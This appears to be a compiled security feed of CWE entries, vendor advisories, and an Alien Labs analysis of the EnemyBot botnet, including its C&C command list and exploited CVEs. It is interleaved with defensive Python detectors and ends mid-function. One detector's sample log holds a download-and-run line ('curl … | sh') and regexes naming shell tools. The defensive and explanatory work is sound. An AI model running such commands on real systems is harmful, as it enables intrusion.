Description The application stores sensitive information in cleartext in a file, or on disk. The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which…
-
CWE-314 – Cleartext Storage in the Registry
Description The application stores sensitive information in cleartext in the registry. Attackers can read the information by accessing the registry key. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. Modes of Introduction: – Architecture and Design …
-
CWE-316 – Cleartext Storage of Sensitive Information in Memory
Description The application stores sensitive information in cleartext in memory. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-312 Consequences Confidentiality: Read Memory Potential Mitigations CVE References CVE-2001-1517 Sensitive authentication information in cleartext in memory. BID:10155 Sensitive authentication information in cleartext in memory. CVE-2001-0984 Password protector leaves passwords in memory…
-
CWE-317 – Cleartext Storage of Sensitive Information in GUI
Description The application stores sensitive information in cleartext within the GUI. An attacker can often obtain data from a GUI, even if hidden, by using an API to directly access GUI objects such as windows and menus. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which…
-
CWE-282 – Improper Ownership Management
Description The software assigns the wrong ownership, or does not properly verify the ownership, of an object or resource. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-284 Consequences Access Control: Gain Privileges or Assume Identity Potential Mitigations Phase: Architecture and Design, Operation Description: Very carefully manage the setting, management,…
-
CWE-283 – Unverified Ownership
Description The software does not properly verify that a critical resource is owned by the proper entity. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-282 Consequences Access Control: Gain Privileges or Assume Identity An attacker could gain unauthorized access to system resources. Potential Mitigations Phase: Architecture and Design, Operation…
-
CWE-284 – Improper Access Control
Description The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Modes of Introduction: – Architecture and Design Related Weaknesses Consequences Other: Varies by Context Potential Mitigations Phase: Architecture and Design, Operation Description: Very carefully manage the setting, management, and handling of privileges. Explicitly manage…
-
CWE-286 – Incorrect User Management
Description The software does not properly manage a user within its environment. Users can be assigned to the wrong group (class) of permissions resulting in unintended access rights to sensitive objects. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-284 Consequences Other: Varies by Context Potential Mitigations CVE References
-
CWE-287 – Improper Authentication
Description When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. Modes of Introduction: – Architecture and Design Likelihood of Exploit: High Related Weaknesses CWE-284 CWE-284 Consequences Integrity, Confidentiality, Availability, Access Control: Read Application Data, Gain Privileges or Assume Identity,…
-
CWE-288 – Authentication Bypass Using an Alternate Path or Channel
Description A product requires authentication, but the product has an alternate path or channel that does not require authentication. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-284 CWE-420 CWE-425 Consequences Access Control: Bypass Protection Mechanism Potential Mitigations Phase: Architecture and Design Description: Funnel all access through a single…
-
CWE-289 – Authentication Bypass by Alternate Name
Description The software performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 Consequences Access Control: Bypass Protection…
-
CWE-29 – Path Traversal: ‘\..\filename’
Description The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ‘\..\filename’ (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. Modes of Introduction: – Implementation Related Weaknesses CWE-23 Consequences Confidentiality, Integrity:…
-
CWE-290 – Authentication Bypass by Spoofing
Description This attack-focused weakness is caused by improperly implemented authentication schemes that are subject to spoofing attacks. Modes of Introduction: – Architecture and Design Related Weaknesses CWE-287 CWE-287 Consequences Access Control: Bypass Protection Mechanism, Gain Privileges or Assume Identity This weakness can allow an attacker to access resources which are not otherwise…
-
CWE-291 – Reliance on IP Address for Authentication
Description The software uses an IP address for authentication. IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the…
-
CWE-292 – DEPRECATED: Trusting Self-reported DNS Name
Description This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350. Modes of Introduction: Related Weaknesses Consequences Potential Mitigations CVE References
-
CWE-293 – Using Referer Field for Authentication
Description The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking. The referer field in HTML requests can be simply modified by malicious users, rendering it useless as a means of checking the validity of the request in question. Modes of Introduction: –…
-
CWE-294 – Authentication Bypass by Capture-replay
Description A capture-replay flaw exists when the design of the software makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes). Capture-replay attacks are common and can be difficult to defeat…
-
CWE-295 – Improper Certificate Validation
Description The software does not validate, or incorrectly validates, a certificate. When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The software might connect to a malicious host while believing it is a trusted host, or…
-
CWE-296 – Improper Following of a Certificate’s Chain of Trust
Description The software does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate. Modes of Introduction: – Architecture and Design Likelihood of Exploit: Low Related Weaknesses CWE-295 CWE-573 Consequences Non-Repudiation:…
USN-5450-1: Subversion vulnerabilities
Evgeny Kotkov discovered that subversion servers did not properly follow
path-based authorization rules in certain cases. An attacker could
potentially use this issue to retrieve information about private paths.
(CVE-2021-28544)
Thomas Weißschuh discovered that subversion servers did not properly handle
memory in certain configurations. A remote attacker could potentially use
this issue to cause a denial of service or other unspecified impact.
(CVE-2022-24070)
New Linux-based ransomware targets VMware servers
Researchers at Trend Micro have discovered some new Linux-based ransomware that’s being used to attack VMware ESXi servers, a bare-metal hypervisor for creating and running several virtual machines (VMs) that share the same hard drive storage. Called Cheerscrypt, the bad app is following in the footsteps of other ransomware programs—such as LockBit, Hive and RansomEXX—that have found ESXi an efficient way to infect many computers at once with malicious payloads.
Roger Grimes, a defense evangelist with security awareness training provider KnowBe4, explains that most of the world’s organizations operate using VMware virtual machines. “It makes the job of ransomware attackers far easier because they can encrypt one server—the VMware server—and then encrypt every guest VM it contains. One compromise and encryption command can easily encrypt dozens to hundreds of other virtually run computers all at once.”
Rapidly evolving IoT malware EnemyBot now targeting Content Management System servers and Android devices
Executive summary
AT&T Alien Labs™ has been tracking a new IoT botnet dubbed “EnemyBot”, which is believed to be distributed by threat actor Keksec. During our investigations, Alien Labs has discovered that EnemyBot is expanding its capabilities, exploiting recently identified vulnerabilities (2022), and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers. In addition, the malware base source code can now be found online on Github, making it widely accessible.
Key takeaways:
EnemyBot’s base source code can be found on Github, making it available to anyone who wants to leverage the malware in their attacks.
The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities.
Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.
The threat group behind EnemyBot, Keksec, is well-resourced and has the ability to update and add new capabilities to its arsenal of malware on a daily basis (see below for more detail on Keksec)
Background
First discovered by Securonix in March 2022 and later detailed in an in-depth analysis by Fortinet, EnemyBot is a new malware distributed by the threat actor “Keksec” targeting Linux machines and IoT devices.
According to the malware’s Github repository, EnemyBot combines source code from multiple botnets into a more powerful and more adaptable malware. The original botnet code that EnemyBot reuses includes Mirai, Qbot, and Zbot. In addition, the malware includes custom development (see figure 1).
Figure 1. EnemyBot page on Github.
The Keksec threat group is reported to have formed back in 2016 from a number of experienced botnet actors. In November 2021, researchers from Qihoo 360 described the threat actor’s activity in detail in a presentation, attributing to Keksec the development of botnets for different platforms, including Windows and Linux:
Linux based botnets: Tsunami and Gafgyt
Windows based botnets: DarkIRC, DarkHTTP
Dual systems: Necro (developed in Python)
Source code analysis
The developer of the Github page on EnemyBot self-describes as a “full time malware dev” who is also available for contract work. The individual states their workplace as “Kek security,” implying a potential relationship with the broader Keksec group (see figure 2).
Figure 2. EnemyBot developer description.
The malware repository on Github contains four main sections:
cc7.py
This module is a Python script that downloads all dependencies and compiles the malware for different OS architectures, including x86, ARM, macOS, OpenBSD, PowerPC, MIPS, and more (see figure 3).
Figure 3. Compiling malware source code to macOS executable.
Once compilation is complete, the script creates a shell script ‘update.sh’, which the bot uses as a downloader: it is delivered to any identified vulnerable targets to spread the malware.
Figure 4. Generated `update.sh` file to spread EnemyBot on different architectures.
enemy.c
This is the main bot source code. Though it is missing the main exploitation function, it includes all other functionality of the malware and the attacks the bot supports by mixing the various botnet source codes as mentioned above (Mirai, Qbot, and Zbot) — mainly Mirai and Qbot (see figure 5).
Figure 5. EnemyBot source code.
hide.c
This module is compiled and manually executed by the attacker to encode / decode the malware’s strings, so that they are hidden in the binary. For that, the malware uses a simple swap table in which each character is replaced with its corresponding character in the table (see figure 6).
Figure 6. String decode.
servertor.c
Figure 7 shows the command-and-control (C&C) component, the botnet controller. The C&C runs on a dedicated machine controlled by the attacker, from which it can control and send commands to infected machines.
Figure 7. C&C component.
New variant analysis
Most of EnemyBot functionality relates to the malware’s spreading capabilities, as well as its ability to scan public-facing assets and look for vulnerable devices. However, the malware also has DDoS capabilities and can receive commands to download and execute new code (modules) from its operators that give the malware more functionality.
In new variants of EnemyBot, the malware added a webscan function containing a total of 24 exploits to attack vulnerabilities of different devices and web servers (see figure 8).
Figure 8. EnemyBot calls for a new function “webscan_xywz”.
To perform these functions, the malware scans random IP addresses; when a host answers with a SYN/ACK, EnemyBot then probes the remote server for vulnerabilities by executing multiple exploits against it.
The first exploit is for the Log4j vulnerability discovered last year as CVE-2021-44228 and CVE-2021-45046:
Figure 9. Exploiting the Log4J vulnerability.
The malware also can adopt new vulnerabilities within days of those vulnerabilities being discovered. Some examples are Razer Sila (April 2022) which was published without a CVE (see figure 10) and a remote code execution (RCE) vulnerability impacting VMWare Workspace ONE with CVE-2022-22954 the same month (see figure 11).
Figure 10. Exploiting vulnerability in Razer Sila.
Figure 11. Exploiting vulnerability in VMWare Workspace ONE.
EnemyBot has also begun targeting content management systems (e.g. WordPress) by searching for vulnerabilities in various plugins, such as “Video Synchro PDF” (see figure 12).
Figure 12. EnemyBot targeting WordPress servers.
In the example shown in figure 12, notice that the malware elevates a local file inclusion (LFI) vulnerability into an RCE by injecting malicious code through ‘/proc/self/environ’. This method is not new and was described in 2009. The malware uses the LFI to include ‘environ’ and passes the shell command in the User-Agent HTTP header, where it ends up in the process environment that the vulnerable script then includes.
Another example of how the malware uses this method is shown in figure 13. In this example the malware is exploiting a vulnerability in DBltek GoIP.
Figure 13. Executing shell command through LFI vulnerability in DBltek.
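The LFI-to-RCE pattern described above leaves two detectable traces in ordinary web-server access logs: a request target that resolves to /proc/self/environ (usually via traversal, sometimes double-encoded) and a User-Agent carrying a shell or PHP payload. The following detector is an added example, not code from the Alien Labs report; the log lines, the script name ‘view.php’ and the IP addresses are constructed.

```python
"""Flag LFI-to-RCE attempts via /proc/self/environ in access logs.

Added example (not from the Alien Labs report). Parses Apache/Nginx "combined"
format lines, percent-decodes the request target (two layers, so double-encoded
traversal is caught), and reports requests that reach /proc/self/environ and/or
carry a shell-like payload in the User-Agent header.
"""
import re
from urllib.parse import unquote

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

PROC_ENVIRON_RE = re.compile(r'proc/self/environ', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
# Payload markers in User-Agent: command substitution, a pipe into a shell,
# a chained downloader/chmod/shell command, or an inline PHP open tag.
UA_PAYLOAD_RE = re.compile(
    r'(?:\$\(|`|\|\s*(?:sh|bash)\b|;\s*(?:wget|curl|chmod|sh|bash)\b|<\?php)',
    re.IGNORECASE,
)

# Constructed sample log (not real traffic): one benign request, one traversal
# to environ with a downloader in User-Agent, one double-encoded traversal.
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2022:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
203.0.113.9 - - [26/May/2022:10:01:05 +0000] "GET /view.php?file=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048 "-" "curl http://203.0.113.9/update.sh | sh"
203.0.113.9 - - [26/May/2022:10:01:09 +0000] "GET /view.php?file=%252e%252e%252fproc%252fself%252fenviron HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def decode_target(target: str) -> str:
    """Percent-decode up to two layers so %252e%252e%252f becomes ../."""
    return unquote(unquote(target))


def analyze_line(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    reasons = []
    if PROC_ENVIRON_RE.search(decoded):
        reasons.append("proc_self_environ")
        if TRAVERSAL_RE.search(decoded):
            reasons.append("path_traversal")
    if UA_PAYLOAD_RE.search(m.group("ua")):
        reasons.append("ua_shell_payload")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "target": decoded,
        "ua": m.group("ua"),
        "reasons": reasons,
    }


def scan_log(text: str):
    """Run analyze_line over every line and keep the findings, in log order."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["reasons"], finding["target"])
```

A User-Agent hit on its own is worth a lower-severity alert; the combination with an environ include on the same source is the strong signal.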
After infection, EnemyBot waits for further commands from its C&C. In parallel, it continues to propagate by scanning for additional vulnerable devices. Alien Labs has listed below the commands the bot can receive from its C&C (accurate as of the publishing of this article).
If an Android device is connected through USB, or an Android emulator is running on the machine, EnemyBot will also try to infect it by executing a shell command (figure 14).
Figure 14. EnemyBot “adb_infect” function to attack Android devices.
Command – Action
SH – Execute shell command
PING – Ping to server, wait for command
LDSERVER – Change loader server for payload
TCPON – Turn on sniffer
RSHELL – Create a reverse shell on an infected machine
TCPOFF – Turn off sniffer
UDP – Start UDP flood attack
TCP – Start TCP flood attack
HTTP – Start HTTP flood attack
HOLD – Start TCP connection flooder
TLS – Start TLS attack, start handshake without closing the socket
STD – Start non-spoofed UDP flooder
DNS – Start DNS flooder
SCANNER ON | OFF – Start/stop scanner: scan and infect vulnerable devices
OVH – Start DDoS attack on OVH
BLACKNURSE – Start ICMP flooder
STOP – Stop ongoing attacks, kill child processes
ARK – Start targeted attack on ARK: Survival Evolved video game server
ADNS – Receive targets list from C&C and start DNS attack
ASSDP – Start SSDP flood attack
We have also listed the current vulnerabilities EnemyBot uses. As mentioned, some of them had not been assigned a CVE as of the publishing of this article.
CVE Number – Affected devices
CVE-2021-44228, CVE-2021-45046 – Log4J RCE
CVE-2022-1388 – F5 BIG IP RCE
No CVE (vulnerability published on 2022-02) – Adobe ColdFusion 11 RCE
CVE-2020-7961 – Liferay Portal – Java Unmarshalling via JSONWS RCE
No CVE (vulnerability published on 2022-04) – PHP Scriptcase 9.7 RCE
CVE-2021-4039 – Zyxel NWA-1100-NH Command injection
No CVE (vulnerability published on 2022-04) – Razer Sila – Command injection
CVE-2022-22947 – Spring Cloud Gateway – Code injection vulnerability
CVE-2022-22954 – VMWare Workspace One RCE
CVE-2021-36356, CVE-2021-35064 – Kramer VIAware RCE
No CVE (vulnerability published on 2022-03) – WordPress Video Synchro PDF plugin LFI
No CVE (vulnerability published on 2022-02) – Dbltek GoIP LFI
No CVE (vulnerability published on 2022-03) – WordPress Cab Fare Calculator plugin LFI
No CVE (vulnerability published on 2022-03) – Archeevo 5.0 LFI
CVE-2018-16763 – Fuel CMS 1.4.1 RCE
CVE-2020-5902 – F5 BigIP RCE
No CVE (vulnerability published on 2019) – ThinkPHP 5.X RCE
No CVE (vulnerability published on 2017) – Netgear DGN1000 1.1.00.48 ‘Setup.cgi’ RCE
CVE-2022-25075 – TOTOLink A3000RU command injection vulnerability
CVE-2015-2051 – D-Link devices – HNAP SOAPAction – Header command injection vulnerability
CVE-2014-9118 – ZHOME < S3.0.501 RCE
CVE-2017-18368 – Zyxel P660HN – unauthenticated command injection
CVE-2020-17456 – Seowon SLR 120 router RCE
CVE-2018-10823 – D-Link DWR command injection in various models
Recommended actions
Maintain minimal exposure to the Internet on Linux servers and IoT devices and use a properly configured firewall.
Enable automatic updates to ensure your software has the latest security updates.
Monitor network traffic, outbound port scans, and unreasonable bandwidth usage.
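The third recommendation, watching for outbound port scans, matches how the bot spreads: an infected host sends SYN probes to many random addresses on one port and most never complete a handshake. The detector below is an added example, not tooling from the report; the Flow record shape, the 10.0.0.0/8 "internal" prefix and the flow records themselves are constructed assumptions.

```python
"""Horizontal outbound-scan detector over flow records (added example).

A host in the monitored network that sends SYN-only probes (no completed
handshake) to at least `threshold` distinct destinations on one port within
`window` seconds is reported once per (source, port). Flow records, the
internal prefix and the numbers are constructed for illustration.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float        # epoch seconds
    src: str
    dst: str
    dport: int
    syn_only: bool   # SYN sent, no handshake completed (typical of a probe)


def detect_outbound_scans(flows, window=60.0, threshold=20,
                          internal_prefixes=("10.",)):
    """Return one alert per (src, dport) that crosses the threshold."""
    recent = defaultdict(deque)   # (src, dport) -> deque of (ts, dst) in window
    alerted = set()
    alerts = []
    for f in sorted(flows, key=lambda x: x.ts):
        # Only outbound probes from monitored hosts are interesting here.
        if not f.syn_only or not f.src.startswith(internal_prefixes):
            continue
        key = (f.src, f.dport)
        q = recent[key]
        q.append((f.ts, f.dst))
        while q and f.ts - q[0][0] > window:   # slide the window forward
            q.popleft()
        distinct = {dst for _, dst in q}
        if len(distinct) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "src": f.src,
                "dport": f.dport,
                "distinct_dsts": len(distinct),
                "first_ts": q[0][0],
                "last_ts": f.ts,
            })
    return alerts


def _sample_flows():
    """Constructed flow records, not real telemetry."""
    flows = []
    # Scanner: 10.0.0.5 probes 30 distinct hosts on tcp/80, one every 0.5 s.
    for i in range(1, 31):
        flows.append(Flow(1000.0 + 0.5 * i, "10.0.0.5", f"203.0.113.{i}", 80, True))
    # Benign: 10.0.0.7 completes five connections to two web servers.
    for i in range(5):
        flows.append(Flow(1000.0 + 3.0 * i, "10.0.0.7", f"198.51.100.{1 + i % 2}", 443, False))
    # Slow prober: 10.0.0.9 sends 25 SYN-only probes 10 s apart, so no more
    # than 7 fall inside any 60 s window and the default threshold is not met.
    for i in range(25):
        flows.append(Flow(2000.0 + 10.0 * i, "10.0.0.9", f"192.0.2.{i + 1}", 23, True))
    return flows


SAMPLE_FLOWS = _sample_flows()

if __name__ == "__main__":
    for a in detect_outbound_scans(SAMPLE_FLOWS):
        print(a)
```

Widening the window (for example to 10 minutes) makes the slow prober visible as well, at the cost of more false positives from legitimate crawlers and monitoring hosts.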
Conclusion
Keksec’s EnemyBot appears to be just starting to spread; however, given the authors’ rapid updates, this botnet has the potential to become a major threat to IoT devices and web servers. The malware can quickly adopt one-day vulnerabilities (within days of a published proof of concept). This indicates that the Keksec group is well resourced and has built the malware to take advantage of vulnerabilities before they are patched, increasing the speed and scale at which it can spread.
Detection methods
The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research.
SURICATA IDS SIGNATURES
Log4j sids: 2018202, 2018203, 2034647, 2034648, 2034649, 2034650, 2034651, 2034652, 2034653, 2034654, 2034655, 2034656, 2034657, 2034658, 2034659, 2034660, 2034661, 2034662, 2034663, 2034664, 2034665, 2034666, 2034667, 2034668, 2034671, 2034672, 2034673, 2034674, 2034676, 2034699, 2034700, 2034701, 2034702, 2034703, 2034706, 2034707, 2034708, 2034709, 2034710, 2034711, 2034712, 2034713, 2034714, 2034715, 2034716, 2034717, 2034723, 2034743, 2034744, 2034747, 2034748, 2034749, 2034750, 2034751, 2034755, 2034757, 2034758, 2034759, 2034760, 2034761, 2034762, 2034763, 2034764, 2034765, 2034766, 2034767, 2034768, 2034781, 2034782, 2034783, 2034784, 2034785, 2034786, 2034787, 2034788, 2034789, 2034790, 2034791, 2034792, 2034793, 2034794, 2034795, 2034796, 2034797, 2034798, 2034799, 2034800, 2034801, 2034802, 2034803, 2034804, 2034805, 2034806, 2034807, 2034808, 2034809, 2034810, 2034811, 2034819, 2034820, 2034831, 2034834, 2034835, 2034836, 2034839, 2034886, 2034887, 2034888, 2034889, 2034890, 2838340, 2847596, 4002714, 4002715
4001913: AV EXPLOIT LifeRay RCE (CVE-2020-7961)
4001943: AV EXPLOIT Liferay Portal Java Unmarshalling RCE (CVE-2020-7961)
4002589: AV EXPLOIT LifeRay Remote Code Execution – update-column (CVE-2020-7961)
2031318: ET CURRENT_EVENTS 401TRG Liferay RCE (CVE-2020-7961)
2031592: ET WEB_SPECIFIC_APPS Liferay Unauthenticated RCE via JSONWS Inbound (CVE-2020-7961)
2035955: ET EXPLOIT Razer Sila Router – Command Injection Attempt Inbound (No CVE)
2035956: ET EXPLOIT Razer Sila Router – LFI Attempt Inbound (No CVE)
2035380: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-2294) (set)
2035381: ET EXPLOIT VMware Spring Cloud Gateway Code Injection (CVE-2022-2294)
2035876: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)
2035875: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)
2035874: ET EXPLOIT VMWare Server-side Template Injection RCE (CVE-2022-22954)
2036416: ET EXPLOIT Possible VMware Workspace ONE Access RCE via Server-Side Template Injection Inbound (CVE-2022-22954)
4002364: AV EXPLOIT Fuel CMS RCE (CVE-2018-16763)
2030469: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M1
2030483: ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902 Attempt M2
2836503: ETPRO EXPLOIT Attempted THINKPHP < 5.2.x RCE Inbound
2836504: ETPRO EXPLOIT Attempted THINKPHP < 5.2.x RCE Outbound
2836633: ETPRO EXPLOIT BlackSquid Failed ThinkPHP Payload Inbound
2026731: ET WEB_SERVER ThinkPHP RCE Exploitation Attempt
2024916: ET EXPLOIT Netgear DGN Remote Command Execution
2029215: ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
2034576: ET EXPLOIT Netgear DGN Remote Code Execution
2035746: ET EXPLOIT Totolink – Command Injection Attempt Inbound (CVE-2022-25075)
4001488: AV TROJAN Mirai Outbound Exploit Scan, D-Link HNAP RCE (CVE-2015-2051)
2034491: ET EXPLOIT D-Link HNAP SOAPAction Command Injection (CVE-2015-2051)
4000095: AV EXPLOIT Unauthenticated Command Injection (ZyXEL P660HN-T v1)
4002327: AV TROJAN Mirai faulty Zyxel exploit attempt
2027092: ET EXPLOIT Possible ZyXEL P660HN-T v1 RCE
4002226: AV EXPLOIT Seowon Router RCE (CVE-2020-17456)
2035950: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M1 (CVE-2020-17456)
2035951: ET EXPLOIT SEOWON INTECH SLC-130/SLR-120S RCE Inbound M2 (CVE-2020-17456)
2035953: ET EXPLOIT D-Link DWR Command Injection Inbound (CVE-2018-10823)
AGENT SIGNATURES
Java Process Spawning Scripting Process
Java Process Spawning WMIC
Java Process Spawning Scripting Process via Commandline (For Jenkins servers)
Suspicious process executed by Jenkins Groovy scripts (For Jenkins servers)
Suspicious command executed by a Java listening process (For Linux servers)
Associated indicators (IOCs)
The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the report.
Mapped to MITRE ATT&CK
The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:
TA0001: Initial Access:
T1190: Exploit Public-Facing Application
TA0008: Lateral Movement:
T1210: Exploitation of Remote Services
T1021: Remote Services
TA0011: Command and Control:
T1132: Data Encoding
T1001: Data Obfuscation
T1030: Proxy:
.003: Multi-hop Proxy
CVE-2021-28509
This advisory documents the impact of an internally found vulnerability in Arista EOS state streaming telemetry agent TerminAttr and OpenConfig transport protocols. The impact of this vulnerability is that, in certain conditions, TerminAttr might leak MACsec sensitive data in clear text in CVP to other authorized users, which could cause MACsec traffic to be decrypted or modified by other authorized users on the device.
CVE-2021-28508
This advisory documents the impact of an internally found vulnerability in Arista EOS state streaming telemetry agent TerminAttr and OpenConfig transport protocols. The impact of this vulnerability is that, in certain conditions, TerminAttr might leak IPsec sensitive data in clear text in CVP to other authorized users, which could cause IPsec traffic to be decrypted or modified by other authorized users on the device.
CWE-69 – Improper Handling of Windows ::DATA Alternate Data Stream
Description
The software does not properly prevent access to, or detect usage of, alternate data streams (ADS).
An attacker can use an ADS to hide information about a file (e.g. its size or the name of the associated process) from the system or from file browsing tools such as Windows Explorer and the ‘dir’ command-line utility. Alternately, the attacker might be able to bypass intended access restrictions for the associated data fork.
Alternate data streams (ADS) were first implemented in the Windows NT operating system to provide compatibility between NTFS and the Macintosh Hierarchical File System (HFS). In HFS, data and resource forks are used to store information about a file. The data fork provides information about the contents of the file while the resource fork stores metadata such as file type.
Modes of Introduction:
– Architecture and Design
Related Weaknesses
Consequences
Access Control, Non-Repudiation, Other: Bypass Protection Mechanism, Hide Activities, Other
Potential Mitigations
Phase: Testing
Description:
Software tools are capable of finding ADSs on your system.
Phase: Implementation
Description:
Ensure that the source code correctly parses the filename to read or write to the correct stream.
CVE References
- CVE-1999-0278
- In IIS, remote attackers can obtain source code for ASP files by appending “::$DATA” to the URL.
- CVE-2000-0927
- Product does not properly record file sizes if they are stored in alternative data streams, which allows users to bypass quota restrictions.
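As an added example, not taken from the CWE entry or from any product: a hypothetical parser that splits a requested path component into its NTFS file name, stream name and stream type, so that handler selection and access checks run on the canonical file name rather than on the raw string (the pattern behind the IIS “::$DATA” source disclosure above). It assumes the request is a URL or NTFS path and that colons never appear in legitimate NTFS file names.

```python
import re
from dataclasses import dataclass

# Added example (hypothetical helper, not CWE or IIS code). One path component
# in NTFS stream syntax is  name[:stream][:$TYPE]; colons are illegal in NTFS
# file names, so any colon in the final component is stream syntax.
STREAM_RE = re.compile(
    r"^(?P<name>[^:]*)(?::(?P<stream>[^:]*))?(?::(?P<type>\$[A-Za-z_]+))?$")

@dataclass(frozen=True)
class StreamRef:
    filename: str
    stream: str        # "" = the unnamed (default) data stream
    stream_type: str   # "$DATA" unless another type is spelled out
    explicit: bool     # True when the request used any ':' stream syntax

def parse_stream_ref(component: str) -> StreamRef:
    """Split one path component into file name, stream name and stream type."""
    m = STREAM_RE.match(component)
    if m is None:
        raise ValueError(f"malformed stream specifier: {component!r}")
    return StreamRef(m.group("name"), m.group("stream") or "",
                     (m.group("type") or "$DATA").upper(), ":" in component)

def last_component(requested: str) -> str:
    return requested.replace("\\", "/").rsplit("/", 1)[-1]

def effective_extension(requested: str) -> str:
    """Extension of the file a request really targets. Handler selection must
    run on this, not on the raw string: 'default.asp::$DATA' is still .asp
    (the IIS source-disclosure pattern behind CVE-1999-0278)."""
    name = parse_stream_ref(last_component(requested)).filename
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def resolve_request(requested: str, allow_streams: bool = False) -> str:
    """Return the canonical file name to open, rejecting stream syntax unless
    the caller explicitly supports alternate data streams."""
    ref = parse_stream_ref(last_component(requested))
    if ref.explicit and not allow_streams:
        raise PermissionError(f"alternate data stream syntax rejected: {requested!r}")
    return ref.filename
```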
CWE-689 – Permission Race Condition During Resource Copy
Description
The product, while copying or cloning a resource, does not set the resource’s permissions or access control until the copy is complete, leaving the resource exposed to other spheres while the copy is taking place.
Modes of Introduction:
– Implementation
Related Weaknesses
Consequences
Confidentiality, Integrity: Read Application Data, Modify Application Data
Potential Mitigations
CVE References
- CVE-2002-0760
- Archive extractor decompresses files with world-readable permissions, then later sets permissions to what the archive specified.
- CVE-2005-2174
- Product inserts a new object into database before setting the object’s permissions, introducing a race condition.
- CVE-2006-5214
- Error file has weak permissions before a chmod is performed.
- CVE-2005-2475
- Archive permissions issue using hard link.
- CVE-2003-0265
- Database product creates files world-writable before initializing the setuid bits, leading to modification of executables.
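As an added example, not taken from the CWE entry: the copy-then-chmod pattern the CVEs above describe, beside a version that creates the copy with its final permissions from the start. `run_demo` plays the other principal, recording the permission bits visible while the copy is still in progress. It assumes a POSIX host; the payload and file names are constructed.

```python
import os
import stat
import tempfile
from typing import Callable

# Constructed sample payload; in practice this would be a key or config file.
SECRET = b"db_password=correct-horse-battery-staple\n"

def _mode(path: str) -> int:
    return stat.S_IMODE(os.stat(path).st_mode)

def copy_then_chmod(src: str, dst: str, final_mode: int,
                    observer: Callable[[str], None]) -> None:
    """Vulnerable pattern (CWE-689): dst is created with the default mode and
    only restricted after the data is written, leaving a window."""
    with open(src, "rb") as fin, open(dst, "wb") as fout:   # 0o666 & ~umask
        fout.write(fin.read())
        fout.flush()
        observer(dst)      # another principal inspects the file mid-copy
    os.chmod(dst, final_mode)

def copy_with_mode(src: str, dst: str, final_mode: int,
                   observer: Callable[[str], None]) -> None:
    """Hardened: create dst with its final permissions from the first instant;
    O_EXCL refuses a pre-existing (possibly attacker-planted) file."""
    fd = os.open(dst, os.O_WRONLY | os.O_CREAT | os.O_EXCL, final_mode)
    with open(src, "rb") as fin, os.fdopen(fd, "wb") as fout:
        fout.write(fin.read())
        fout.flush()
        observer(dst)
    os.chmod(dst, final_mode)  # only matters if the umask stripped wanted bits

def run_demo(copier) -> int:
    """Copy SECRET with `copier` asking for 0o600; return the permission bits a
    concurrent observer saw while the copy was still in progress."""
    old_umask = os.umask(0o022)   # common default: files come out 0o644
    seen = {}
    try:
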